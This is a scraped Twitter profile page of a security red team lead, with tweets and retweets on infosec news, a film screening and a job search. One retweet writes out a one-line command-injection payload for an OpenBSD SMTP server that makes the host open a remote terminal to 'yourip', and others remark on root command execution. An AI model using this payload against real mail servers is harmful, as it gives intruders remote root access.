Aaron Grattafiori

@dyn___

Red Team Lead at Facebook. Ex-Principal Consultant and Researcher @ iSEC Partners/NCC Group. Keyboard cowboy. Lying DormanCyber Pathogen Dealer. Views are mine.

Colorado
Vrijeme pridruživanja: ožujak 2014.

Tweetovi

Blokirali ste korisnika/cu @dyn___

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @dyn___

  1. Prikvačeni tweet
    16. sij
    Poništi
  2. proslijedio/la je Tweet
    Poništi
  3. proslijedio/la je Tweet
    1. velj

    Nothing is more hilarious then us-cert and every defensive company somehow convincing themselves and the whole world that nobody has a BSD 0day kernel lpe . Look if you suddenly find out that your VPN is running a perl CGI-bin , the solution is to immediately get a new VPN.

    Poništi
  4. 1. velj

    CC for your nightmares, and for your "I told you so"

    Prikaži ovu nit
    Poništi
  5. 1. velj

    A break from infosec tweeting... to bring you diaries from the Amazon Dystopian Future, featuring the echo dot kids edition:

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    1. velj

    I was today years old when I found out that has a note to self feature which also supports disappearing messages.

    Poništi
  7. 31. sij

    Disclaimer: I have no connection to MDsec other than being a blog fanboi I haven't taken the training either, but it sounds like it covers alltbhe right things, is modern, and has excellent trainers.

    Prikaži ovu nit
    Poništi
  8. 31. sij

    "This course is not just about learning how to run tools, students will learn how the tools work under the hood as well as how to develop and customise their own; an essential skill for any red teamer." <--- this right here. 👌 Looking for a red team training? Look no further.

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    29. sij
    Poništi
  10. proslijedio/la je Tweet
    30. sij
    Poništi
  11. proslijedio/la je Tweet
    30. sij

    OpenBSD sEcUrE bY DeFaUlT exploit: MAIL FROM:<;xterm --display yourip:0;>

    Poništi
  12. 30. sij

    So cool.... Go see it at Alamo Drafthouse near you! Thanks Alamo!

    Prikaži ovu nit
    Poništi
  13. 30. sij

    Ok... Flying through the computer and the Gibson... WAY cooler on the big screen.

    Prikaži ovu nit
    Poništi
  14. 30. sij

    The 35mm is so.... analog. Although it's probably similar to the VHS I grew up watching and stole from blockbuster. But seeing it on the big screen is so. cool.

    Prikaži ovu nit
    Poništi
  15. 30. sij
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    29. sij

    Any advisory that contains the line “to overcome this limitation we drew inspiration from the Morris worm” in 2020 is pure gold. Team Qualys continues their retro onslaught vs OpenBSD.

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    29. sij

    Pretty great article on deescalation and intervention tactics, if you witness someone being harassed in public.

    Poništi
  18. proslijedio/la je Tweet
    29. sij

    Remote shell metacharacter injection and command-execution as root in an SMTP server... what year is it again?

    Poništi
  19. proslijedio/la je Tweet
    28. sij

    I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suite is web and mobile security, with lots of bug bounty experience. My resume and contact info are on , DMs open as well. RT's are much appreciated.

    Poništi
  20. proslijedio/la je Tweet

    "Physically remove your network vulnerabilities with ease!"

    Poništi
  21. proslijedio/la je Tweet
    28. sij

    Imagine a world where there's another bug similar to the Microsoft CryptoAPI thing, China has it, and your network was built by Huawei. Fun thought exercise, no?

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·